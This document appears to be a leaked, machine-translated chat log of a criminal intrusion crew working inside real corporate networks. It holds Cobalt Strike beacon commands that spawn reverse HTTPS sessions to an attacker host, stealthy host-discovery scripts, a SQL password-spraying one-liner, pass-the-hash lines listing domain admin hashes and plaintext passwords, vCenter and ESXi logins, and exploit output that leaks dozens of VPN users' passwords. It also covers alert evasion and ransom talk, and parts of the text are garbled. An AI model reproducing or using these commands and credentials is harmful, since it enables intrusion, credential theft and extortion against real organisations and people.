servicePrincipalName: RestrictedKrbHost/TLCRDSLIC1
servicePrincipalName: HOST/TLCRDSLIC1
servicePrincipalName: RestrictedKrbHost/TLCRDSLIC1.loomisco.com
servicePrincipalName: HOST/TLCRDSLIC1.loomisco.com
```
There are lots of SPNs out there. What parameters should I look at to sort them?
Anything that is grouped: exchange, web, sql, dc, backup, ftp, etc.
Try other options to get it in a different context and see what you can do with it:
```
DCs
TLCDC2
TLCDC1
-----
SQL
LOOMISBENSQL01
```
which groups?
```
beacon> spawnas loomisco.com\Shutdown p3bk@c1 3333
[*] Tasked beacon to spawn windows/beacon_bind_pipe (\\.\pipe\msagent_6736) as loomisco.com\Shutdown
[+] host called home, sent: 255580 bytes
[-] could not run C:\Windows\system32\mstsc.exe as loomisco.com\Shutdown: 5
[-] Could not connect to pipe: 2
```
Other servers are sorted into groups while some are busy with sharefinder
try the smb listener
```
beacon> spawnas loomisco.com\EDIADMIN APPSYS https
[*] Tasked beacon to spawn windows/beacon_https/reverse_https (oldplex.com:443) as loomisco.com\EDIADMIN
[+] host called home, sent: 261169 bytes
[-] could not run C:\Windows\system32\mstsc.exe as loomisco.com\EDIADMIN: 5
```
How do you spawn?
No process YES, under it does not spawn, works, does not work etc.
I am waiting for some kind of feedback guys, let's not be silent)
not through make_token, but the full process from the domain admin process as above
throw in a separate message host - OS and so on
then full log files from the domain admin context
run sharefinder until scanned in this form
While the scanning is going on, if everything is clear, I thought there would be a question why)
no questions about it, no?
yes
`portscan 192.168.0.0/24 445 icmp 1024`
the result here all four at once I start or wait until each works?
and run in turn
at the end add `icmp 1024`
`portscan 192.168.0.0/24 445`
before scanning the ports
the command here
192.186.1.0/24
not the experience of using the utility ping?)
stop
port scan to smb ports
let's go ahead and agree that the work on the task min 10
command ping, do sysadmins need to discuss this?
192.168.8.0/24
10.10.10.0/24
the sticking point is, we do something, we can't do it, we ask you, all you give us is leading questions and vague answers like @user8
please make a list of subnets
192.168.8
20 * 70 min
100 / 5 = 20
10.10.10.0
ping 5% of the workload for today
192.168.0.0/24
192.168.3.0/24
10.10.10.0/24
192.168.8.0/24
just let's do the math:
waiting for the subnets
who knows not to go to the darwin prize go to /24 mask
70 minutes per ping, this is a new record)
fuck why do i have to repeat it twice?
less than half of them removed
```
mstsc.exe 4840 Services 0 13,640 K Unknown NT AUTHORITY\SYSTEM 0:03:30 N/A
mstsc.exe 4304 Services 0 61,060 K Unknown NT AUTHORITY\SYSTEM 0:51:19 N/A
mstsc.exe 5868 Console 3 3,052 K Unknown SCANSTORAGE\Administrator 0:00:00 N/A
mstsc.exe 5564 Console 3 3,016 K Unknown SCANSTORAGE\Administrator 0:00:00 N/A
mstsc.exe 3056 Services 0 12,480 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
mstsc.exe 3188 Services 0 12,216 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
mstsc.exe 4996 Services 0 12,944 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
mstsc.exe 2420 Services 0 20,184 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
mstsc.exe 3388 Services 0 14,380 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
mstsc.exe 1176 Services 0 12,052 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
mstsc.exe 1152 Services 0 11,964 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
```
27-52
second half of the hosts will arrive when the pings are done? it's been an hour
I see
It's been an hour
Is this not a problem either?
@user1 @user3 where is local control in groups? it's total anarchy
leave yourself two sessions and sit in single sessions
call his pc to reboot and do not even think to jump in winlogon
I would open tasklist as an advanced user would see something wrong
Work quietly
I'll open the process sheet and delete all mstsc that I find
and also need host with this approach, is the ip address written? or just the host - active?
I know it's late.... but
```
$job = foreach ($line in (Get-Content hostlist.txt)) {
    if (Test-Connection -ComputerName $line -Count 1 -Quiet) {
        Start-Sleep -s 3
        Write-Warning $line
        Write-Output "$line - Active"
    }
}
$job | Out-File alive.txt -Append
```
I hope you're not scanning hosts 2-3 times, it's not funny, you're scanning 4 times too.
no, the question was to the point about the startup priorities
rights look out for each other, after all there are 6 people around you
guys well honestly asked to keep it down, immediately removed `-n`
setlocal enabledelayedexpansion ?
in an hour you can ping by hand
pinging by hand, just sit on it for an hour
anyone thought that if you catch an error in the console, it is logged somewhere on the server, or even some alert
user I asked to do it quietly
ping from every session run from all cobs
file the same output, is it you from two cobs ping?
in beacon the error is pinged above
there was a check, you also do not agree with each other with the same error
i asked 2 hosts to check, it has not changed
file i can not see, the file went to 692, that's why i asked to throw the command -output
3388 not all sessions i see there and run the file i have `C:\Users\pgo.bat` and inside the bat you have a
relative path to ping
How do you think it will run?) you are in `C:\windows\system32\ping.exe` lying in `C:\ProgramData\ping.bat`, you are in `C:\ProgramData` and run `ping`
and has anyone thought about prioritization? specifically about the rat, remember I asked you about environment variables
i *please ping 50 hosts as quietly and automatically as possible*
the rest of you: i'll do it!
```
@echo off
for /f %%i in (HOSTLIST.TXT) do (
    timeout /T 3 /nobreak
    ping %%i -n 1 -4 >> pingedhosts.txt
)
```
with this I do not understand what the problem is, yes the error, but the ping is passed, in the outfile it is
not assembled correctly (again you poke everything in a row? What kind of house you have there)
```
The process cannot access the file because it is being used by another process.
ERROR: Input redirection is not supported, exiting the process immediately.
```
I've dropped the priority of the ping to jump to the system processes
now the mstsc processes
is the second command cob)))))))))))))
-4?)
`-n 1 -4`
I guess it's counting down from -4, where it's coming from
and this?
is a bat file in the studio
```
beacon> shell pgo.bat
[*] Tasked beacon to run: pgo.bat
[+] host called home, sent: 38 bytes
[+] received output:
ERROR: Input redirection is not supported, exiting the process immediately.
ERROR: Input redirection is not supported, exiting the process immediately.
```
I wrote `fix` and remove loop 1 and `echo %s:%p >> result.txt` on timeout
was a bat file, you should have fixed it in matches and just replace osql with ping
```
for /f %s in (srv.txt) do @ (for /f %p in (pwd.txt) do @ osql -S %s -U sa -P %p -Q "select @@servername" >> result.txt && echo %s:%p >> result.txt)
```
Write @echo off in the beginning.
1>>
Output file
```
Pinging LDSWYO21.loomisco.com [192.168.0.69] with 32 bytes of data:
Reply from 192.168.0.69: bytes=32 time<1ms TTL=128
Ping statistics for 192.168.0.69:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms
Pinging LOOMISGT2.loomisco.com [192.168.0.57] with 32 bytes of data:
Reply from 192.168.0.57: bytes=32 time<1ms TTL=128
Ping statistics for 192.168.0.57:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms
```
The bat file error
```
The process cannot access the file because it is being used by another process.
ERROR: Input redirection is not supported, exiting the process immediately.
```
```
beacon> shell pingtimeout.bat
[*] Tasked beacon to run: pingtimeout.bat
[+] host called home, sent: 46 bytes
[+] received output:
C:\users>for /F %i in (HOSTLIST.TXT) do ( timeout /T 3 /nobreak ping %i -n 1 -4 1>>pingedhosts.txt )
C:\users>( timeout /T 3 /nobreak ping LDSWYO21.loomisco.com -n 1 -4 1>>pingedhosts.txt )
ERROR: Input redirection is not supported, exiting the process immediately.
C:\users>( timeout /T 3 /nobreak ping LOOMISGT2.loomisco.com -n 1 -4 1>>pingedhosts.txt )
ERROR: Input redirection is not supported, exiting the process immediately.
```
you yourself are delaying progress
It's only 5% of the workload today, ping test takes forever, so what?
and what is the problem here? at most google, okay at least yandex
did not ping) under the vpn? on the dedic....
6 minutes to throw a bat file, a file with 2 hosts and run? why so long?
on 2 hosts first check the total report form
well no, at the stage of post ping already determine the interesting hosts or not
in the cycle, ping - sleep
just asked the guys write a bat file
by hand whether you ping?
I'm not talking about the bat in the context of bat commands
sleep even exists? again do not think? if you do it by hand, after each ping write sleep 3?
what? also search the file and substitute a string in the ping command + sleep
yes, you had a bat file on almost similar actions) add there sleep, which was thrown on the forum?
batnick to ping this list at intervals of 3 sec
excellent
```
TLCDC2.loomisco.com
TLCDC1.loomisco.com
Termsrv5.loomisco.com
TERMSRV.loomisco.com
TermsrvVendors.loomisco.com
loomisgw2.loomisco.com
LOOMISBENSQL01.loomisco.com
STORAGE.loomisco.com
IMAGING2-NEW.loomisco.com
Traveler1.loomisco.com
WebChat.loomisco.com
TLCWEBP1.loomisco.com
TLCWEBT1.loomisco.com
MITELWINSERVER.loomisco.com
Wyomissing_Ex1.loomisco.com
Printsrv08.loomisco.com
VeeamBackups.loomisco.com
EobStorage.loomisco.com
LOOMISFAXR01.loomisco.com
TLCMONITORING.loomisco.com
loomiswebsrv4.loomisco.com
TLCWebP2.loomisco.com
ScanStorage.loomisco.com
FSITrack.loomisco.com
PDFStorage.loomisco.com
TLCSophos.loomisco.com
TLCSKLM1.loomisco.com
TLCSKLM2.loomisco.com
LoomisIndioDB01.loomisco.com
Printsrv16.loomisco.com
LOOMISFAXR02.loomisco.com
TLCStorage1.loomisco.com
TLCAutoTFR.loomisco.com
Loomissftp1.loomisco.com
EpicAPM.loomisco.com
loomisgwdb2.loomisco.com
Metafile-vm1.loomisco.com
TLCANALYTICS1.loomisco.com
LDSWYO21.loomisco.com
LOOMISGT2.loomisco.com
TLCEPICAS01.loomisco.com
TERMSRV1.loomisco.com
TLCAutoTF2.loomisco.com
TLCEPICCS01.loomisco.com
TLCEPICDB01.loomisco.com
TLCEPICTS01.loomisco.com
TLCEPICTS02.loomisco.com
TLCRDSLIC1.loomisco.com
TLCSQLDB1.loomisco.com
TLCEPICIIS1.loomisco.com
TLCBENTS01.loomisco.com
TLCBENTS02.loomisco.com
```
Do not run the ping list binary on all servers here with a mass ping, reduce the amount of traffic and make one ping per host
by default 4 pings per hostname, no need to do it as usual: ping hostname.com
total 53 names * 3 sec = 150 sec for the entire ping of the servers
exactly
after 1 ping slip 2-3 sec
ping neatly
now, take a list of their hostnames
this is further
15telno
53 server OS in the domain
carefully, this DK question what?
```
Server Name  IP Address
-----------  ----------
TLCDC1       192.168.0.192
TLCDC2       192.168.0.222
```
How many servers in the domain?)
ahead of eedr,av1) look for trusts, if there is a need to get into each of themdetermine the scale + as you go along write yourself a plan and designate the steps of the other, just on the netmask continue to look for configurations of ipn or something else ?runningvslo, announced then take on personal koba who in the general does not fly, or dll, well, you know the methods you know not spawn sessions still, we have no minute, let's go, all downloaded and opened a sessiongoodgolove not do 20 sessions in the koba if you want you can work on the general koba for the team, or on their own personal go heretofore, to be in front of my eyes took from here AD info and stuff yeah, now only scanstreege does not hang forwarda did you have a lot of them?user4user8user3 pass the session to the first group https://sky-vcenter65.skytech1.local/websso/SAML2/SSOSSL?RelyingPartyEntityId=aHR0cHM6Ly9za3ktdmNlbnRlcjY1L3ZzcGhlcmUtY2xpZW50L3NhbWwvd2Vic3NvL21ldGFkYXRhlacol.1hcetyks.56retnecv-yks ``` ``` https://sky-vcenter65.skytech1.local/websso/SAML2/SSO/vsphere.local?SAMLRequest=zVRbb5swFH7fr0B%2BBwMhl1olVdasWqV2zUo2TXuZHHOSWAOb%2BRhI%2F%2F0MSbasaqs87hE45zvfTVxe7crCa8Cg1ColURASD5TQuVSblHxZ3vgTcjV9d4m8LCo2q%2B1WPcKvGtB6M0Qw1q1da4V1CSYD00gBtyqHXUoc0NyNScVtD721tkJGKf588hsByoIZDQP3ZEFso6DQghe0hRWiptns%2Fi6mWfZAG6y2YGD%2FmXg32gjoWaRkzQsE4t3OU%2FIjGa34IOTrZDQOxzDkwyHk6%2FHkYpxMRsk6FG4MFxxRNvB3EbF2ZNFyZVMSh9GFH478aLgMYxZGbBAFkzD8TryF0VYLXbyXau9KbRTTHCUyxUtAZgXrCLM4CNlqP4Ts43K58BcP2bIHaGQO5pObTsk%2F%2BlmSDIj39Wh%2F3NnvAlHIesPfvlUdiJHpIZ5ekTkfgB8TJNMX06G1pB3MMZYSLM%2B55Zf09N7%2BelyxTt%2FtfKELKZ68WVHo9toAt06zNTX04ZXcvk2peyNzf92PsqozBq2jQ7xs0eF%2Frnkh1xLMK4V6jfKprfG5vtKDNOYansvOKDyFOdvc5ygHkMat7GU4FU3ZctdzoUuKYgslR8qtNX4PTF07Yxom9MPOmdF1BY%2BCdij%2FYLRtG7SDQJuNWwgj%2Bu3%2BLuuxfNnXXLgQ3DyzT5ULpTvPHkFBy1cFLN27FwT%2FR1TnUMDmlCp9Hs70WMzT%2F9T0Nw%3D%3D&SigAlg=http%3A%2F%2Fwww.w3.org%2F2001%2F04%2Fxmldsig-more%23rsa-sha256&Signature=eRWAEo1neECMdgPBw4japogtN7ytgmx1WzNL0VGEaYILRx3sY3nsk0rPEnd5C2p8HFEdQo
Gid8aNA9dpZUHnuez%2F ``sphere didn't find no passwords saved anywhere, go there from two DAs, their cars are not in the help3nets all ready? Group name Domain Admins Comment Designated administrators of the domain Members ------------------------------------------------------------------------------- $DUPLICATE-2119 ABT ABT_NOC bbesadmin BESAdmin ccg ChuckM DP.Admin dpmonitoring dtake hcohn justinladmin kton lvetula mech.admin mmiller pcsupport ppad ppope printer RIVERBED scadmin skyadmin The command completed successfully. [+] received output: Group name Enterprise Admins Comment Designated administrators of the enterprise Members ------------------------------------------------------------------------------- ABT DP.Admin dpmonitoring lvetula skyadmin vmtaccess - pass !scheduler! The command completed successfully. pth SKYTECH1.LOCAL\bbesadmin b7e996a9282b045b181ab26ba27f6242 $uperm@n pth SKYTECH1.LOCAL\ChuckM 357f64ecfb2e984a0357ebe783a67b5d C@mion60% pth SKYTECH1.LOCAL\dtake 70b0745f98701b7e845ee0f643f72396 pth SKYTECH1.LOCAL/kton 89d585960d5cc84307a58cc796c056 pth SKYTECH1.LOCAL\mmiller bab390b9b53882a294c052f279709832 pth SKYTECH1.LOCAL/ppope 1cc7f9f96985a521d4f446baa4d317222 pth SKYTECH1.LOCAL/scadmin d8ed94135ac1934f65715849bb23158f pth SKYTECH1.LOCAL\ABT 219ec549d9c21c9ff299ff0c9bb6c713 pth SKYTECH1.LOCAL\BESAdmin b7e996a9282b045b181ab26ba27f6242 pth SKYTECH1.LOCAL\DP.Admin.3de232cafad8fe4bbcb8439b38ea53ea 2qlp30m@10! pth SKYTECH1.LOCAL\hcohn 674e48b68c5cd0efd8f7e5faa87b3d1e pth SKYTECH1.LOCAL\pcsupport 1f94856253679db5c13219e28209af6f pth SKYTECH1.LOCAL\printer c3bc7de91d256a9981721bc321eaaece pth SKYTECH1.LOCAL\skyadmin 4c56183000f9766dc2881881af3030e8 !FlyB0y! 
pth SKYTECH1.LOCAL\ABT_NOC 13ce9c02efe8314fa80702ea14a77b57 pth SKYTECH1.LOCAL\ccg c66c74eeb51a62cc730835b62145f56f pth SKYTECH1.LOCAL\dpmonitoring 6850366281608a824050d3de0435ea87 pth SKYTECH1.LOCAL\justinladmin cb81135da647477b7617cd6a88c769f9 pth SKYTECH1.LOCAL\mech.admin 3c6a21328ef5eb39401dadadc79785c0 pth SKYTECH1.LOCAL\ppad 27ecb8e1762139addd7ab2952f2314e0 pth SKYTECH1.LOCAL\RIVERBED 073db11c8586bc9280708d8c95c86ff6 SKY-BEDMW-01.skytech1.local - VEEAM BACKUP SERVERS sky-beuza-01.skytech1.local DMW-CHUCKM1-PC.skytech1.local admin PC's 10.0.6.54:445 (platform: 500 version: 6.1 name: SKYNASJEN domain: WORKGROUP) NAS admin/password FS visible from YES 10.0.6.83:445 (platform: 500 version: 4.9 name: LS520DC5F domain: WORKGROUP) nas 10.0.6.153:445 (platform: 500 version: 4.9 name: SKYNASDMW domain: SKYTECH1) nas 10.0.2.127:445 (platform: 500 version: 6.1 name: SKYNASSC domain: VOLUME) nas Website: https://sky-vcenter65.skytech1.local Username: 'administrator@vsphere.local' Password: 'Superm@n2018' https://10.0.2.32/ui/#/login ESXi' root\$uperm@n https://10.0.2.34/ui/#/login https://10.0.2.36/ui/#/login https://10.0.2.38/ui/#/login https://10.0.6.24/ui/ ``Go to sleep all night, the session is in the slip, the files have been deleted. good night good love is more expensive than money)apparently:D braggingbamba why is it here?)and morefiles were lost? in the slip have thrown sessions? 
good night good night then this + - to 4-5 nights and until the end until we close two networks tomorrow by 16:00 so we shift to 4 day tomorrow night close if tomorrow morning will not work tomorrow morning be in place by 11, in the morning close the grid to 10 todaydavay then close it today..571 koba you have on the team is the second koba do not even need less than 100 servers, although the grid is not big and if the armies to mount the servers will do with what is there I think just take your colleagues tomorrow planned another 4 in total if you have everything ready we can today will also close tomorrow? no, with the last koba problem is likely to replace tomorrow koba today wait?if there is a problem, then feedback here or if in lsv case you have doubts you can check in your conditions (on the deck) i had the day before yesterday, i think, assembled - it works. and @user9 today i did it, it does not work. hehehehehe nevertheless i had a feeling that he would be fine if he got a little frustrated. really now armas in the network just nothing. yesterday there were more@user4 on the classic zamakte to the servers? looking for access to the trusts, trying to pull the network to kobu nas, check the options, how to interact with armasak write me here 1 person from the team 1 message what are we doing now on your networks mepereperemple) @user9 you had 4.2 give it to everyone please+@user7 give it to your colleagues? or you stupidly will not let the client take only a new one all day come on hurry up 1 is delayed there are 2 koby newokk @user8 thenokmdon't care who wants to help @user8 and @user4@user7 @user9 I haven't created anything yet[ ](https://mediaeveryone.com/channel/general?msg=p3HK9CSDutpKMds27) and I haven't created anything for you? I don't have a conf) or you mean #lrhc-org? 
@user7 Also @user9 write a report in the confu I'm picking SNU.EDUgoersportnu I have devry.edu, but I'm there a week already digging and in a deadlock practically, who has what tasks at the moment?:man_raising_hand:hello all:space_invader:tomorrow both are closingdone the other 2.kznmughu, that's itvrp blocked by this is no ping setup according to the manual through the system interface no configser:IntSniDPlT6NZww6lqxw `206.221.176.24:12372` give us the config I have no scanner on the deck even if they dropped the coboo? so what? we are not going to forward sessions from the network Sessions from the dedicle are stalled. If the dedic is locked, then yes [ ](https://mediaeveryone.com/group/evo-com?msg=KqNpb6s2bNEb29MYE) ??? keymiss.com kimhd.com ``If we need our dedic and ipn in the coba[ ](https://mediaeveryone.com/group/evo-com?msg=nKHfycDdHecz9t6ma) ??? What's the coba got to do with any of this? I take it the coba was dropped. What the fuck is your problem with the dk? maybe the icmp's just blocked Just scan it to 445 just to get the whole thing. C:\Users\user>ping -n 1 172.17.70.8 Pinging 172.17.70.8 with 32 bytes of data: Request timed out. Ping statistics for 172.17.70.8: Packets: Sent = 1, Received = 0, Lost = 1 (100% loss), ``The name was resolved without a lock then 172.17.70.8 from the addicts behind the VPNPinging evo.local [172.17.70.7] with 32 bytes of data: Request timed out. Ping statistics for 172.17.70.7: Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),and what's stopping him from hitting a rdp or something[ ](https://mediaeveryone.com/group/evo-com?msg=2PzAw9f6Gk6hLWiYA) I think a couple of exact 6am starts to clean us? 
3 I told you, admins are scared of any alerts, they're 3 km away, the net is probably fucked up, you've failed to send alerts to Cbdk is unavailable, sessions are down again, the main thing is to remember the accesses and settings, and preferably look for ones that are closer to you by geo, because the speed will be the limit on the channel@tl1 will give here you can take the brutalized daikas for 2-5 bucks any i reckon? and put everything in nulinmax kilnet services and processes by batnyms on the net remotely just a few daikas on vpn will startwhy it will not doena karbon yes, i think, if it is not cut off, we do nothing here on karbon often 2fa?[ ](https://mediaeveryone.com/group/evo-com?msg=gfgePBNWxTQR2ETHJ) yes, the vpn works i can't see the ldap, it won't give out anything i can't get it to work over the dub. over the wpn doesn't work? in some cases i've had to run mimic a few times, any command you run but ps\ls and so on you run it and the session dies how do i get backupkey without mimic? nope, i don't have time to run mimic - session dies But i don't believe it, you need domain masterkey, i'll try to take it off. do it like we did when we discussed drino chrome, we can't take it off, it takes 10-15 seconds to kill the session, you can either make_tokerthe context of the user) well fuck it) cb any injector chopskob or avNa servers / armas, why I do not know. After about 10 seconds it falls off. Logging in with delkihere how and why? Sessions are dropping (((``. * Username : vipreadmin * Domain : N0fUck!NCr1++3r$ ``The drop in revenue has directly affected our margins :( ``the faithful have long noticed that everyone starts with 10 percent1 quality lock))) apparently they are with the ends of the locks funny)340k offer)on the overland negotiators already)+hold both [+] Checking URL https://66.161.144.31 [+] Found latest version (9.x+) of SMA appliance [+] Appliance running version 10.2.0.3-24sv [+] Leaking sessions to dump configuration. 
[+] Found: SessionID: 0hxjuDPHx83Rx4vG8T96wfFnQJGVF4UZhT4JrIxBFCYU= userType: 1 userName: rhaffey Password: Carebear11 Domain: Planes [+] Found: SessionID: 1XVOagEBBe6ptLv3yQbhtq0lFpb10KBXlKkRrxUhoKw= userType: 1 userName: mwest Password: Howklmw4 Domain: Planes [+] Found: SessionID: 1ckROGo1Wh7imySZPl7uMtcThtOiXie239BHZP95Xho= userType: 1 userName: grikmim Password: mrckk-0020 Domain: Planes [+] Found: SessionID: 8hrnUTXzfeMdpqBv0uQ6bZG13AJC8QIEezcikn6rRlU= userType: 1 userName: gexnill Password: Fruitninja22 Domain: Planes [+] Found: SessionID: 9pJuG9Tld0RDo08uJYlOoGD0VrQvFKue6qkPfip2dVI= userType: 1 userName: romber Password: Gberry700! Domain: Planes [+] Found: SessionID: DNmFdoJaPCMVDgQ1Z4FwvwMTE5QBqtFMiwBe9BOMZjQ= userType: 1 userName: mitriks Password: AEVT030121! Domain: Planes [+] Found: SessionID: EWtPIi0Eb05MnQhVXQLSqCTNnEtoz5GqRL0WLvU17sk= userType: 1 userName: redgemmtb Password: Tr! [+] Found: SessionID: NeCBR0enViW4ICjFiFeW1F8D92KfgWrTvWgv6007TKM= userType: 1 userName: jmurchis Password: Sabian44987#@ Domain: Planes [+] Found: SessionID: OSKex2Y0GoB38oixxxdQQYc0MT5nKJxf4oeKdSo8yxI= userType: 1 userName: kinjens Password: Greeleys7145 Domain: Planes [+] Found: SessionID: PFCReDwF0qqxJW36ByuCDpZ5J0Zhdl6AfZr8rwFyNEbo= userType: 1 userName: cenglish Password: Alexa019 Domain: Planes [+] Found: SessionID: S52bhF0epI6AWy2O5NVtpUT5rZR2qlVUIRxpfSUXnoM= userType: 1 userName: tilewa Password: Odin2021 Domain: Planes [+] Found: SessionID: SiHFTV6qqKeYsOaTDH8xA4PkOvUW36syhQlhyZjBE30= userType: 1 userName: lesdorn Password: MountVernon25** Domain: Planes [+] Found: SessionID: W1lJsx3fZ100ndMXQPAceYzqyXC1spoSv0zMq5a5hpg= userType: 1 userName: kyteldra Password: Kcakalpld0517! 
Domain: Planes [+] Found: SessionID: WCrZqMccVULFytN0wPY4rB8K636yaP5cV1W5911pRdg= userType: 1 userName: keynemik Password: LumbarL3 Domain: Planes [+] Found: SessionID: Z9sppmZwgJec3Jk0Kcv05sSmQvFwyoe0UVGkv251SeM= userType: 1 userName: dmontgom Password: January2021 Domain: Planes [+] Found: SessionID: advcBv38ZtYqUBAZCVVJl6QoZahzK0UPV5JGBzpLNgk= userType: 1 userName: valura Password: Lacapi2021 Domain: Planes [+] Found: SessionID: bBNhpCwSpZvM7dA04zlPGZvJoBZdk4Z6HMu9wGm3FVg= userType: 1 userName: jmcgrath Password: 36R-mel*21 Domain: Planes [+] Found: SessionID: djXXAOgtFljaj3O9l7OgG2VC8fyYPyPkjb5j1BF1QCNMI= userType: 1 userName: gkeifer Password: Hrmboys8! Domain: Planes [+] Found: SessionID: fUvKJ6qa7PkHQWQWcOeUBBRJctY4JUqJtUGDLVSzLGgns= userType: 1 userName: gcarney Password: Happy2021 Domain: Planes [+] Found: SessionID: kVgDYoRK1ajqbOijrK1uGLNeXE0T99We5MlZSPkXCg= userType: 1 userName: bbradford Password: H@ndb@ll2021 Domain: Planes [+] Found: SessionID: kv38f02A9WSGjNj0xjVedVFinxYdWiyeNZ4aXnYOtCkE= userType: 1 userName: esolotim Password: Qwerty19 Domain: Planes [+] Found: SessionID: lY1v5WeWLHRc2qZQyyrHLtBc4rdOk9LzTvffD108Tc= userType: 1 userName: fsmith Password: Castle47####### Domain: Planes [+] Found: SessionID: n6R7KD4fgc11jsFwF0KV5iduYKRSPyveO22K7zCO1CE= userName: 1 userName: barnlisa Password: ROSIEb22 Domain: Planes [+] Found: SessionID: nRoJ3ZfgAlELS0rtqpLJtpXwRJ6OcBNVflg9KxlcX1s= userType: 1 userName: croltiny Password: globalWORKplace7! Domain: Planes [+] Found: SessionID: qB1kBsFrKOLYL4w9aOktA6jYoJTMc68KRJJoXo3siXCnE= userType: 1 userName: mwinters Password: Carnage2021 Domain: Planes [+] Found: SessionID: u0Xqpn7w8fS4vZn6SAO1JFUYHUTczh5Y5yeoxebQWWg= userType: 1 userName: sanski Password: Jac2010! 
Domain: Planes [+] Found: SessionID: uxs9u9LxBrtY1Oqrx3WuEJPXOsEvmhgMhvr1JHl3rRw= userType: 1 userName: mshafor Password: February2021 Domain: Planes [+] Found: SessionID: v1buCFcYonMDuhyVfRnHwBh6YgNpqjwhTSe5eSMoYu8= userType: 1 userName: ferncroa Password: Bengals21 Domain: Planes [+] Found: SessionID: v5i1hwKI0xbE01s9nPuO9F531n0MxrNE0YYyyel2za0k= userType: 1 userName: wbowen Password: Dptwmb2028 Domain: Planes [+] Found: SessionID: vu19JgbC8zsPGm0q8phBOqUsKIFtkn9itd00j06MuAI= userType: 1 userName: gflasch Password: Pepper33$ Domain: Planes [+] Found: SessionID: wGwVAfJOrLok0CrbbB7g9dUQAlZP2YsQmw9p1113thE= userType: 1 userName: jamafd Password: Hobart2535y Domain: Planes [+] Found: SessionID: wbL2CzsEWESKJxcQw13TBJ7ebU4i6bl7qnffGC0n8Afw= userType: 1 userName: obrown Password: Planes0121 Domain: Planes [+] Found: SessionID: yNylXi0x041YdNCoxmjaGiwG5Y22WNb4tcqD5Dkid1Y= userType: 1 userName: moordavi Password: Planes1! Domain: Planes [+] Done with https://66.161.144.31, found 33 sessions `````` [+] Leaking sessions to dump configuration. [+] Found: SessionID: 1jHJ05pyjLQw0GZvgyDhnE2jJwv0sFnc9toWZFFQpSM= userType: 1 userName: suanino Password: Hotshots23 Domain: L&M Domain [+] Found: SessionID: 2urLQzwRsyR8FeQ16VaeYISe9gx2GjzEsv72IJeAvgs= userType: 1 userName: rcarrington Password: Rlcbkjcngm987! Domain: L&M Domain [+] Found: SessionID: 79iXsjaZpFZpfHSj3Ij1jtx8nABpP8QVMWftVldHrMaw= userType: 1 userName: mlong Password: Joshua2013!!!!!!! Domain: L&M Domain [+] Found: SessionID: 8toG4Gmy3DmF9dC4SIG8xGNjILAsXynGs8QT1mr6tHU= userType: 1 userName: kurban Password: DeerHunter22! Domain: L&M Domain [+] Found: SessionID: 8z190N9G2yCG14bTKpo68J0XDqzOCwPh5mQCheC8DPw= userType: 1 userName: nfranklin Password: Sundae24!!! 
Domain: L&M Domain [+] Found: SessionID: 9dJs2tiaLfZpV0Ma7g79oY1aG4FvW79kZIkVJU7tnqQ= userType: 1 userName: tegan Password: Mylilbuddy1 Domain: L&M Domain [+] Found: SessionID: ANDOyUyyl83haHEqaDbW13thjxrxpXsySbIXwK0rcGw= userType: 1 userName: rcraighead Password: Afapek112819 Domain: L&M Domain [+] Found: SessionID: Di0eR39DlxGZqqkVMdkQ20bSKw4z2Uo2zHnxAQZrC0S4= userType: 1 userName: terriw Password: Merrow3s934 Domain: L&M Domain [+] Found: SessionID: GIzvltAkPe26aebMF4CtohrIBaJrtO7FLvYslvZE0Iw= userType: 1 userName: mwilson Password: RiverMae@11 Domain: L&M Domain [+] Found: SessionID: GJwdPkGWSom4T4JP1JPooIVCY5voOguyrBsZmjFUaeLtg= userType: 1 userName: kcarrington Password: G@lDR063r6 Domain: L&M Domain [+] Found: SessionID: InbYkxJ3mH25VGAHIQb01Iqsgiigau3AhN2G7XJprHQ= userType: 1 userName: ssimmons Password: Coffee123! Domain: L&M Domain [+] Found: SessionID: Kk4ZwUtcpCl7ozEkAKv001HZlGnPaaTlZLr6g3HJsRw= userType: 1 userName: hmckinney Password: Family2020! Domain: L&M Domain [+] Found: SessionID: MovBR6w0IEb3zi10yKeZEQAxhnX6FvffdnToB52EGlY= userType: 1 userName: Bjones Password: @pr!lSh0werz1997ch Domain: L&M Domain [+] Found: SessionID: NjNnAwqla1uOuTn1fn1fE3p5XNvQ5Ox9JXAICPmWv0PPUk= userType: 1 userName: sbushnoe Password: Winter2020! 
Domain: L&M Domain [+] Found: SessionID: R1n01UtSop80AzxWza6lGCvBgqhRUvWoaO37cF7wG7A= userType: 1 userName: bjohnson Password: Multigard!@#$ Domain: L&M Domain [+] Found: SessionID: WFv4gr1f2DaaoE5KVayg4otU6hdLdFqWXYm8EM60PrcE= userType: 1 userName: toutman Password: Lightning02 Domain: L&M Domain [+] Found: SessionID: WTxex4JI0WxT5BhqrexrtTTALLHvU5A2QYohVpxtvjs= userType: 1 userName: georgew Password: 195Deeznuts$ Domain: L&M Domain [+] Found: SessionID: XhI3mae1Lxc7KLkcqqTkfi1S7lp5nW911N72LTQom0Yc= userType: 1 userName: tshaw Password: lamTEN#5053 Domain: L&M Domain [+] Found: SessionID: YwTFCvcrti79HYq8DTV43VU5vhqHC4cNzcC86OLunyc= userType: 1 userName: rdake Password: Carsyn12345 Domain: L&M Domain [+] Found: SessionID: bKVOGsqTD6dIGUfLaLeoraJyswAbkDZftcVW5QeKsPY= userType: 1 userName: jzeman Password: Bluebird11 Domain: L&M Domain [+] Found: SessionID: cCMKVWpdz76nmwmUSFilNoqlHRLefonQH0llEt8T0G8= userType: 1 userName: moscar Password: $Shell123456789 Domain: L&M Domain [+] Found: SessionID: gamTBY5ApMu1IIyMn4x9VztNpfYws0p5fLOw2VejseY= userType: 1 userName: mgarrison Password: Roscoe1971! Domain: L&M Domain [+] Found: SessionID: h3nDgyEj7JDo8BaSNkaxJbgM80kv15xVXLqeobLWI0w= userType: 1 userName: lindab Password: Hobart528$20211 Domain: L&M Domain [+] Found: SessionID: 